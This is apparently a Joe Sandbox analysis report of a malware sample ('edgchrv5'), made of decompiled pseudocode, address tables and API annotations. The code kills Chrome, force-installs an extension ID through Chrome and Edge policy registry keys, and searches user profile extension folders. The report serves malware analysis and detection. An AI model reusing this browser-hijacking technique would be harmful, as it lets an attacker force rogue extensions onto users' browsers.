                                                                                                					if(__eflags < 0) {
                                                                                                						0xdd85ab6a();
                                                                                                					}
                                                                                                					_t270 = E01001330(_t376, _t479, L" /IM chrome.exe", _t481 - 0x424); // executed
                                                                                                					if(__eflags != 0) {
                                                                                                						if (__eflags != 0) goto L75;
                                                                                                						__eflags = _t270 + _t481;
                                                                                                					}
                                                                                                					Sleep(0x2bc); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xb585e590();
                                                                                                					}
                                                                                                					 *(_t481 - 0x374c) = 0;
                                                                                                					while(1) {
                                                                                                						_t439 =  *(_t481 - 0x374c);
                                                                                                						__eflags = _t439 -  *(_t481 - 0x353c);
                                                                                                						if(__eflags >= 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if (__eflags == 0) goto L84;
                                                                                                						__eflags = _t479 +  *((intOrPtr*)(_t481 + 1));
                                                                                                					}
                                                                                                					if(__eflags > 0 && __eflags <= 0) {
                                                                                                						0xc9b0a3fd();
                                                                                                					}
                                                                                                					 *(_t481 - 0x3750) = 0;
                                                                                                					__eflags =  *(_t481 - 0x3750) -  *(_t481 - 0x353c);
                                                                                                					if(__eflags >= 0) {
                                                                                                						Sleep(0x1388); // executed
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                						}
                                                                                                						E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                						asm("clc");
                                                                                                						if(__eflags < 0) {
                                                                                                							0x27887eb();
                                                                                                						}
                                                                                                						E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                						Sleep(0x1388); // executed
                                                                                                						_t436 = _t481 - 0x424;
                                                                                                						E01001330(_t376, _t479, L" /F /IM chrome.exe /T", _t481 - 0x424); // executed
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                							0xfc4d();
                                                                                                						}
                                                                                                						_t274 = 0;
                                                                                                						__eflags = 0;
                                                                                                						goto L113;
                                                                                                					} else {
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                							0xc9b0b3ef();
                                                                                                						}
                                                                                                						_t441 =  *(_t481 - 0x3750) * 0x208;
                                                                                                						__eflags = _t441;
                                                                                                						_push(_t481 + _t441 - 0x3328);
                                                                                                						_t390 =  *0x101d264; // 0x145f9e0
                                                                                                						_t442 = _t481 - 0x630;
                                                                                                						_t277 = E01002B10(_t390, _t442, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma\\1.0_0\\src\\jquery-3.5.1.min.js", _t390);
                                                                                                						_t490 = _t488 + 0x10;
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							_t376 = _t376 >> 0xff;
                                                                                                							_t107 = _t390 + 2; // 0x2e0000
                                                                                                							__eflags = _t277 - 1 -  *_t107;
                                                                                                							if(_t277 - 1 !=  *_t107) {
                                                                                                								goto L123;
                                                                                                							}
                                                                                                							 *(_t481 - 0x3fbc) =  *(_t481 - 0x3fbc) + 4;
                                                                                                							 *((intOrPtr*)(_t481 - 0x3fb8)) =  *((intOrPtr*)(_t481 - 0x3fb8)) + 4;
                                                                                                							__eflags =  *((short*)(_t481 - 0x3fc0));
                                                                                                							if( *((short*)(_t481 - 0x3fc0)) != 0) {
                                                                                                								L117:
                                                                                                								_t442 =  *(_t481 - 0x3fbc);
                                                                                                								_t284 =  *_t442;
                                                                                                								 *((short*)(_t481 - 0x3fbe)) = _t284;
                                                                                                								__eflags = _t284 -  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fb8))));
                                                                                                								if(_t284 !=  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fb8))))) {
                                                                                                									goto L123;
                                                                                                								} else {
                                                                                                									__eflags =  *((short*)(_t481 - 0x3fbe));
                                                                                                									if( *((short*)(_t481 - 0x3fbe)) == 0) {
                                                                                                										goto L122;
                                                                                                									} else {
                                                                                                										_t442 =  *(_t481 - 0x3fbc);
                                                                                                										_t277 =  *((intOrPtr*)(_t442 + 2));
                                                                                                										 *((short*)(_t481 - 0x3fc0)) = _t277;
                                                                                                										_t390 =  *((intOrPtr*)(_t481 - 0x3fb8));
                                                                                                										continue;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								L122:
                                                                                                								 *(_t481 - 0x3fc4) = 0;
                                                                                                							}
                                                                                                							L124:
                                                                                                							 *(_t481 - 0x3fc8) =  *(_t481 - 0x3fc4);
                                                                                                							__eflags =  *(_t481 - 0x3fc8);
                                                                                                							if( *(_t481 - 0x3fc8) != 0) {
                                                                                                								 *((intOrPtr*)(_t481 - 0x3fcc)) = L"..";
                                                                                                								 *(_t481 - 0x3fd0) = _t481 - 0x3d74;
                                                                                                								while(1) {
                                                                                                									_t462 =  *(_t481 - 0x3fd0);
                                                                                                									_t345 =  *_t462;
                                                                                                									 *((short*)(_t481 - 0x3fd2)) = _t345;
                                                                                                									__eflags = _t345 -  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fcc))));
                                                                                                									if(_t345 !=  *((intOrPtr*)( *((intOrPtr*)(_t481 - 0x3fcc))))) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags =  *((short*)(_t481 - 0x3fd2));
                                                                                                									if( *((short*)(_t481 - 0x3fd2)) == 0) {
                                                                                                										L130:
                                                                                                										 *(_t481 - 0x3fd8) = 0;
                                                                                                									} else {
                                                                                                										_t462 =  *(_t481 - 0x3fd0);
                                                                                                										_t348 =  *((intOrPtr*)(_t462 + 2));
                                                                                                										 *((short*)(_t481 - 0x3fd4)) = _t348;
                                                                                                										_t129 =  *((intOrPtr*)(_t481 - 0x3fcc)) + 2; // 0x2e
                                                                                                										__eflags = _t348 -  *_t129;
                                                                                                										if(_t348 !=  *_t129) {
                                                                                                											break;
                                                                                                										} else {
                                                                                                											 *(_t481 - 0x3fd0) =  *(_t481 - 0x3fd0) + 4;
                                                                                                											 *((intOrPtr*)(_t481 - 0x3fcc)) =  *((intOrPtr*)(_t481 - 0x3fcc)) + 4;
                                                                                                											__eflags =  *((short*)(_t481 - 0x3fd4));
                                                                                                											if( *((short*)(_t481 - 0x3fd4)) != 0) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                												goto L130;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									L132:
                                                                                                									 *(_t481 - 0x3fdc) =  *(_t481 - 0x3fd8);
                                                                                                									__eflags =  *(_t481 - 0x3fdc);
                                                                                                									if(__eflags != 0) {
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                											0xffc2();
                                                                                                										}
                                                                                                										E01002B40(_t481 - 0x3938, _t481 - 0x3d74);
                                                                                                										_t490 = _t490 + 8;
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                										}
                                                                                                									}
                                                                                                									while(1) {
                                                                                                										L139:
                                                                                                										_t391 =  *(_t481 - 0x3fac);
                                                                                                										_t282 = FindNextFileW(_t391, _t481 - 0x3da0);
                                                                                                										__eflags = _t282;
                                                                                                										if(__eflags == 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags =  *(_t481 - 0x3da0) - 0x10;
                                                                                                										 *_t282();
                                                                                                										if(__eflags == 0) {
                                                                                                											 *((intOrPtr*)(_t481 - 0x3fb8)) = ".";
                                                                                                											 *(_t481 - 0x3fbc) = _t481 - 0x3d74;
                                                                                                											goto L117;
                                                                                                										}
                                                                                                									}
                                                                                                									_t443 =  *(_t481 - 0x3fac);
                                                                                                									FindClose(_t443);
                                                                                                									if(__eflags != 0 && __eflags == 0) {
                                                                                                										0x8589();
                                                                                                									}
                                                                                                									__eflags = 0;
                                                                                                									 *(_t481 - 0x3730) = 0;
                                                                                                									_push(0x206);
                                                                                                									 *_t443 = _t391 +  *_t443;
                                                                                                									_push(_t481 - 0x372e);
                                                                                                									E01007BE0(_t478);
                                                                                                									_push(_t481 - 0x3938);
                                                                                                									_t399 = _t481 - 0x3730;
                                                                                                									E01002B10(_t399, _t399, L"%s\\Microsoft\\EdgeCore\\%s\\msedge.exe", _t481 - 0x420);
                                                                                                									_t492 = _t490 + 0x1c;
                                                                                                									_t445 = _t481 - 0x3730;
                                                                                                									_t291 = GetFileAttributesW(_t445); // executed
                                                                                                									__eflags = _t291 - 0xffffffff;
                                                                                                									if(__eflags != 0) {
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                											0xfeeca783();
                                                                                                										}
                                                                                                										_t292 = _t481 - 0x214;
                                                                                                										 *((intOrPtr*)(_t292 + 0x68))();
                                                                                                										asm("aas");
                                                                                                										 *_t478 =  *_t478 + _t399;
                                                                                                										 *_t445 =  *_t445 + _t399;
                                                                                                										__eflags =  *_t445;
                                                                                                										 *(_t481 - 0x3b50) = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist", ??, ??, ??);
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                										}
                                                                                                										__eflags =  *(_t481 - 0x3b50);
                                                                                                										_t155 = _t481 + 0x2f;
                                                                                                										 *_t155 = _t445 +  *(_t481 + 0x2f);
                                                                                                										__eflags =  *_t155;
                                                                                                									} else {
                                                                                                										asm("clc");
                                                                                                										if(__eflags < 0) {
                                                                                                											0xeac055d1();
                                                                                                										}
                                                                                                										_t316 = 0;
                                                                                                									}
                                                                                                									__eflags =  *(_t481 - 4) ^ _t481;
                                                                                                									return E01002B7C(_t316, _t376,  *(_t481 - 4) ^ _t481, _t450, _t478, _t479);
                                                                                                									goto L296;
                                                                                                								}
                                                                                                								asm("sbb edx, edx");
                                                                                                								asm("sbb edx, 0xffffffff");
                                                                                                								 *(_t481 - 0x3fd8) = _t462;
                                                                                                								goto L132;
                                                                                                							}
                                                                                                							goto L139;
                                                                                                							L123:
                                                                                                							asm("sbb edx, edx");
                                                                                                							asm("sbb edx, 0xffffffff");
                                                                                                							 *(_t481 - 0x3fc4) = _t442;
                                                                                                							goto L124;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t274 = 0;
                                                                                                					L113:
                                                                                                					return E01002B7C(_t274, _t376,  *(_t481 - 4) ^ _t481, _t436, _t478, _t479);
                                                                                                				}
                                                                                                				L296:
                                                                                                			}


















































                                                                                                0x010019d1
                                                                                                0x010019d1
                                                                                                0x010019d1
                                                                                                0x010019d1
                                                                                                0x010019d4
                                                                                                0x010019d5
                                                                                                0x010019d7
                                                                                                0x010019e4
                                                                                                0x010019ea
                                                                                                0x010019f0
                                                                                                0x010019f7
                                                                                                0x010019f9
                                                                                                0x010019fa
                                                                                                0x010019fc
                                                                                                0x010019fc
                                                                                                0x01001a0a
                                                                                                0x01001a10
                                                                                                0x01001a11
                                                                                                0x01001a13
                                                                                                0x01001a13
                                                                                                0x01001a15
                                                                                                0x01001a1a
                                                                                                0x01001a1d
                                                                                                0x01001a22
                                                                                                0x01001a23
                                                                                                0x01001a25
                                                                                                0x01001a25
                                                                                                0x01001a23
                                                                                                0x01001a27
                                                                                                0x01001a2b
                                                                                                0x01001a2b
                                                                                                0x01001a35
                                                                                                0x01001a43
                                                                                                0x01001a49
                                                                                                0x01001a4a
                                                                                                0x01001a4c
                                                                                                0x01001a4c
                                                                                                0x01001a53
                                                                                                0x01001a59
                                                                                                0x01001a59
                                                                                                0x01001a5e
                                                                                                0x01001a71
                                                                                                0x01001a76
                                                                                                0x01001a79
                                                                                                0x01001a79
                                                                                                0x01001a8c
                                                                                                0x01001a92
                                                                                                0x01001a98
                                                                                                0x01001a98
                                                                                                0x01001a9d
                                                                                                0x01001aa7
                                                                                                0x01001ab2
                                                                                                0x01001ab9
                                                                                                0x01001abe
                                                                                                0x01001ac8
                                                                                                0x01001ace
                                                                                                0x01001ad1
                                                                                                0x01001ad7
                                                                                                0x01001adb
                                                                                                0x01001adb
                                                                                                0x01001add
                                                                                                0x01001afa
                                                                                                0x01001b06
                                                                                                0x01001b15
                                                                                                0x01001b21
                                                                                                0x01001b27
                                                                                                0x01001b30
                                                                                                0x01001b44
                                                                                                0x01001b50
                                                                                                0x01001b5c
                                                                                                0x01001b5f
                                                                                                0x01001b65
                                                                                                0x01001b65
                                                                                                0x01001b6f
                                                                                                0x01001b73
                                                                                                0x01001b73
                                                                                                0x01001b6f
                                                                                                0x01001b75
                                                                                                0x01001b79
                                                                                                0x01001b79
                                                                                                0x01001b7b
                                                                                                0x01001b7b
                                                                                                0x01001b7f
                                                                                                0x01001b7f
                                                                                                0x01001b8c
                                                                                                0x01001b91
                                                                                                0x01001b94
                                                                                                0x01001b96
                                                                                                0x01001b9c
                                                                                                0x01001b9d
                                                                                                0x01001b9f
                                                                                                0x01001b9f
                                                                                                0x01001ba1
                                                                                                0x01001ba6
                                                                                                0x01001bbb
                                                                                                0x01001bc0
                                                                                                0x01001bd3
                                                                                                0x01001bdf
                                                                                                0x01001bf8
                                                                                                0x01001c04
                                                                                                0x01001c13
                                                                                                0x01001c1f
                                                                                                0x01001c25
                                                                                                0x01001c2e
                                                                                                0x01001c42
                                                                                                0x01001c4e
                                                                                                0x01001c5d
                                                                                                0x01001c63
                                                                                                0x01001c25
                                                                                                0x01001bd3
                                                                                                0x01001c6d
                                                                                                0x01001c74
                                                                                                0x01001c7b
                                                                                                0x01001c81
                                                                                                0x01001c81
                                                                                                0x01001c89
                                                                                                0x01001c8d
                                                                                                0x01001c8d
                                                                                                0x01001c96
                                                                                                0x01001c9f
                                                                                                0x01001ca3
                                                                                                0x01001ca3
                                                                                                0x01001ca4
                                                                                                0x01001caf
                                                                                                0x01001cb6
                                                                                                0x01001cbb
                                                                                                0x01001cbe
                                                                                                0x01001cbf
                                                                                                0x01001cc1
                                                                                                0x01001cc1
                                                                                                0x01001cd6
                                                                                                0x01001cdb
                                                                                                0x01001cde
                                                                                                0x01001cdf
                                                                                                0x01001ce1
                                                                                                0x01001ce1
                                                                                                0x01001cf7
                                                                                                0x01001cfc
                                                                                                0x01001cfe
                                                                                                0x01001cff
                                                                                                0x01001cff
                                                                                                0x01001d01
                                                                                                0x01001d17
                                                                                                0x01001d1c
                                                                                                0x01001d20
                                                                                                0x01001d20
                                                                                                0x01001d36
                                                                                                0x01001d3b
                                                                                                0x01001d3c
                                                                                                0x01001d3e
                                                                                                0x01001d3e
                                                                                                0x01001d56
                                                                                                0x01001d5b
                                                                                                0x01001d5f
                                                                                                0x01001d5f
                                                                                                0x01001d75
                                                                                                0x01001d7a
                                                                                                0x01001d7b
                                                                                                0x01001d7d
                                                                                                0x01001d7d
                                                                                                0x01001d8b
                                                                                                0x01001d90
                                                                                                0x01001d92
                                                                                                0x01001d93
                                                                                                0x01001d93
                                                                                                0x01001d9a
                                                                                                0x01001da0
                                                                                                0x01001da1
                                                                                                0x01001da3
                                                                                                0x01001da3
                                                                                                0x01001da5
                                                                                                0x01001dc0
                                                                                                0x01001dc0
                                                                                                0x01001dc6
                                                                                                0x01001dcc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01001dce
                                                                                                0x01001dcf
                                                                                                0x01001dcf
                                                                                                0x01001e2d
                                                                                                0x01001e31
                                                                                                0x01001e31
                                                                                                0x01001e32
                                                                                                0x01001e53
                                                                                                0x01001e59
                                                                                                0x01001ed7
                                                                                                0x01001edd
                                                                                                0x01001edd
                                                                                                0x01001ef6
                                                                                                0x01001efb
                                                                                                0x01001efc
                                                                                                0x01001efe
                                                                                                0x01001efe
                                                                                                0x01001f14
                                                                                                0x01001f1e
                                                                                                0x01001f24
                                                                                                0x01001f30
                                                                                                0x01001f35
                                                                                                0x01001f39
                                                                                                0x01001f39
                                                                                                0x01001f3b
                                                                                                0x01001f3b
                                                                                                0x00000000
                                                                                                0x01001e5b
                                                                                                0x01001e5b
                                                                                                0x01001e5f
                                                                                                0x01001e5f
                                                                                                0x01001e66
                                                                                                0x01001e66
                                                                                                0x01001e73
                                                                                                0x01001e74
                                                                                                0x01001e80
                                                                                                0x01001e87
                                                                                                0x01001e8c
                                                                                                0x01001e8f
                                                                                                0x01001e8f
                                                                                                0x01002050
                                                                                                0x01002051
                                                                                                0x01002054
                                                                                                0x01002054
                                                                                                0x01002058
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0100205a
                                                                                                0x01002061
                                                                                                0x01002068
                                                                                                0x01002070
                                                                                                0x01002018
                                                                                                0x01002018
                                                                                                0x0100201e
                                                                                                0x01002021
                                                                                                0x0100202e
                                                                                                0x01002031
                                                                                                0x00000000
                                                                                                0x01002033
                                                                                                0x01002033
                                                                                                0x0100203b
                                                                                                0x00000000
                                                                                                0x0100203d
                                                                                                0x0100203d
                                                                                                0x01002043
                                                                                                0x01002047
                                                                                                0x0100204e
                                                                                                0x00000000
                                                                                                0x0100204e
                                                                                                0x0100203b
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002089
                                                                                                0x0100208f
                                                                                                0x01002095
                                                                                                0x0100209c
                                                                                                0x010020a2
                                                                                                0x010020b2
                                                                                                0x010020b8
                                                                                                0x010020b8
                                                                                                0x010020be
                                                                                                0x010020c1
                                                                                                0x010020ce
                                                                                                0x010020d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010020d3
                                                                                                0x010020db
                                                                                                0x01002112
                                                                                                0x01002112
                                                                                                0x010020dd
                                                                                                0x010020dd
                                                                                                0x010020e3
                                                                                                0x010020e7
                                                                                                0x010020f4
                                                                                                0x010020f4
                                                                                                0x010020f8
                                                                                                0x00000000
                                                                                                0x010020fa
                                                                                                0x010020fa
                                                                                                0x01002101
                                                                                                0x01002108
                                                                                                0x01002110
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01002110
                                                                                                0x010020f8
                                                                                                0x01002129
                                                                                                0x0100212f
                                                                                                0x01002135
                                                                                                0x0100213c
                                                                                                0x0100213e
                                                                                                0x01002142
                                                                                                0x01002142
                                                                                                0x01002152
                                                                                                0x01002157
                                                                                                0x0100215a
                                                                                                0x0100215a
                                                                                                0x0100215a
                                                                                                0x0100215f
                                                                                                0x0100215f
                                                                                                0x01002166
                                                                                                0x0100216d
                                                                                                0x01002173
                                                                                                0x01002175
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01001ff5
                                                                                                0x01001ffa
                                                                                                0x01001ffc
                                                                                                0x01002002
                                                                                                0x01002012
                                                                                                0x00000000
                                                                                                0x01002012
                                                                                                0x01001ffc
                                                                                                0x0100217b
                                                                                                0x01002182
                                                                                                0x01002188
                                                                                                0x0100218c
                                                                                                0x0100218c
                                                                                                0x0100218e
                                                                                                0x01002190
                                                                                                0x01002197
                                                                                                0x0100219b
                                                                                                0x010021a4
                                                                                                0x010021a5
                                                                                                0x010021b3
                                                                                                0x010021c0
                                                                                                0x010021c7
                                                                                                0x010021cc
                                                                                                0x010021cf
                                                                                                0x010021d6
                                                                                                0x010021dc
                                                                                                0x010021df
                                                                                                0x010021ed
                                                                                                0x010021f1
                                                                                                0x010021f1
                                                                                                0x010021f2
                                                                                                0x010021f7
                                                                                                0x010021fa
                                                                                                0x010021fb
                                                                                                0x010021fd
                                                                                                0x010021fd
                                                                                                0x01002210
                                                                                                0x01002216
                                                                                                0x01002216
                                                                                                0x0100221b
                                                                                                0x01002221
                                                                                                0x01002221
                                                                                                0x01002221
                                                                                                0x010021e1
                                                                                                0x010021e1
                                                                                                0x010021e2
                                                                                                0x010021e4
                                                                                                0x010021e4
                                                                                                0x010021e6
                                                                                                0x010021e6
                                                                                                0x01002931
                                                                                                0x0100293b
                                                                                                0x00000000
                                                                                                0x0100293b
                                                                                                0x0100211e
                                                                                                0x01002120
                                                                                                0x01002123
                                                                                                0x00000000
                                                                                                0x01002123
                                                                                                0x00000000
                                                                                                0x0100207e
                                                                                                0x0100207e
                                                                                                0x01002080
                                                                                                0x01002083
                                                                                                0x00000000
                                                                                                0x01002083
                                                                                                0x01002050
                                                                                                0x01001c98
                                                                                                0x01001c98
                                                                                                0x01001f3d
                                                                                                0x01001f4a
                                                                                                0x01001f4a
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions,00000000,000F003F,?), ref: 010019E4
                                                                                                • RegDeleteKeyW.ADVAPI32(?,ecffbknobglofafinobbcmaionnihcma), ref: 01001A0A
                                                                                                Strings
                                                                                                • SOFTWARE\Google\Chrome\Extensions, xrefs: 010019DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteOpen
                                                                                                • String ID: SOFTWARE\Google\Chrome\Extensions
                                                                                                • API String ID: 3632437661-3566514512
                                                                                                • Opcode ID: 0f2064f1ce09fd4770b33ad239f424443fc882a17413397bdb49442a3cb60bd1
                                                                                                • Instruction ID: c183edb76c19b3dccaa24130fa5eccb5e6134d580697b8337a670f5f851eeb6f
                                                                                                • Opcode Fuzzy Hash: 0f2064f1ce09fd4770b33ad239f424443fc882a17413397bdb49442a3cb60bd1
                                                                                                • Instruction Fuzzy Hash: 57E09A70805356ABDB275F708C0C29CBA64AB22631F244BCAE1B9920E3D379C2C1CB06
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 010012A3
                                                                                                • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000002,?), ref: 010012F8
                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0100130A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 779948276-0
                                                                                                • Opcode ID: db7c11ad30ea1ffeaa7bce15382c1b47a50a64aab214d61af40d1df0bc7bec56
                                                                                                • Instruction ID: ff4226ce4195826263f1d35a14917f6efb8b946ef5a21afbf7d326a3c1f93727
                                                                                                • Opcode Fuzzy Hash: db7c11ad30ea1ffeaa7bce15382c1b47a50a64aab214d61af40d1df0bc7bec56
                                                                                                • Instruction Fuzzy Hash: 9B214AB5900209EBDF15DFE8C984AFEBBB4AF48710F008649F640A7281D775DA50CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0100576B() {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				WCHAR* _t1;
                                                                                                				void* _t5;
                                                                                                				void* _t18;
                                                                                                				WCHAR* _t20;
                                                                                                
                                                                                                				_t1 = GetEnvironmentStringsW();
                                                                                                				_t20 = _t1;
                                                                                                				if(_t20 != 0) {
                                                                                                					if( *_t20 != 0) {
                                                                                                						goto L3;
                                                                                                						do {
                                                                                                							do {
                                                                                                								L3:
                                                                                                								_t1 =  &(_t1[1]);
                                                                                                							} while ( *_t1 != 0);
                                                                                                							_t1 =  &(_t1[1]);
                                                                                                						} while ( *_t1 != 0);
                                                                                                					}
                                                                                                					_t13 = _t1 - _t20 + 2;
                                                                                                					_t5 = E010041A5(_t1 - _t20 + 2); // executed
                                                                                                					_t18 = _t5;
                                                                                                					if(_t18 != 0) {
                                                                                                						E01009050(_t13, _t18, _t20, _t18, _t20, _t13);
                                                                                                					}
                                                                                                					FreeEnvironmentStringsW(_t20);
                                                                                                					return _t18;
                                                                                                				} else {
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}










                                                                                                0x0100576e
                                                                                                0x01005774
                                                                                                0x0100577a
                                                                                                0x01005783
                                                                                                0x00000000
                                                                                                0x01005785
                                                                                                0x01005785
                                                                                                0x01005785
                                                                                                0x01005786
                                                                                                0x01005787
                                                                                                0x0100578d
                                                                                                0x0100578e
                                                                                                0x01005785
                                                                                                0x01005798
                                                                                                0x0100579c
                                                                                                0x010057a1
                                                                                                0x010057a6
                                                                                                0x010057b8
                                                                                                0x010057bd
                                                                                                0x010057a9
                                                                                                0x010057b4
                                                                                                0x0100577c
                                                                                                0x0100577f
                                                                                                0x0100577f

                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,01003090), ref: 0100576E
                                                                                                • __malloc_crt.LIBCMT ref: 0100579C
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 010057A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                • String ID:
                                                                                                • API String ID: 237123855-0
                                                                                                • Opcode ID: 620c4ef5a85d5fd04f7af115a81030291add549a169ec899337ea2a80e9da517
                                                                                                • Instruction ID: 203133b8cd5a7d3920334d2fd1534d06991215e2174f444a5e024ebc4c975d0e
                                                                                                • Opcode Fuzzy Hash: 620c4ef5a85d5fd04f7af115a81030291add549a169ec899337ea2a80e9da517
                                                                                                • Instruction Fuzzy Hash: 63F02777604021AEFB6376387C4C4BB16A8EAC7125B1244A5F4DAC31C1FE204C869AA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SHGetKnownFolderPath.SHELL32(0100C178,00008000,00000000,0101D264,0100287A), ref: 01002A46
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderKnownPath
                                                                                                • String ID: jjj
                                                                                                • API String ID: 3622228125-2289343631
                                                                                                • Opcode ID: 53438df88e5d9fa7f0a64d89b56ec208ba92dac44a7d1c7da4c66a26e44b8553
                                                                                                • Instruction ID: faae31c0b7600cd2df4e7bdddb0ff8e3f3f37d893b14acc6766e7a595bab99c8
                                                                                                • Opcode Fuzzy Hash: 53438df88e5d9fa7f0a64d89b56ec208ba92dac44a7d1c7da4c66a26e44b8553
                                                                                                • Instruction Fuzzy Hash: CB11E921E8874557F5F776BE0C0DB6D2690AF67730F0C8ACAAAE2A52D3DD4094C48233
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 19%
                                                                                                			E01001563(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t33;
                                                                                                				void* _t52;
                                                                                                				void* _t53;
                                                                                                				intOrPtr _t61;
                                                                                                				void* _t66;
                                                                                                				void* _t67;
                                                                                                				void* _t68;
                                                                                                				void* _t75;
                                                                                                				void* _t76;
                                                                                                
                                                                                                				_t75 = __eflags;
                                                                                                				_t67 = __esi;
                                                                                                				_t66 = __edi;
                                                                                                				_t53 = __ecx;
                                                                                                				_t52 = __ebx;
                                                                                                				 *((intOrPtr*)(__ecx - 1))();
                                                                                                				asm("adc eax, 0x100c00c");
                                                                                                				if(__eflags > 0 && __eflags <= 0) {
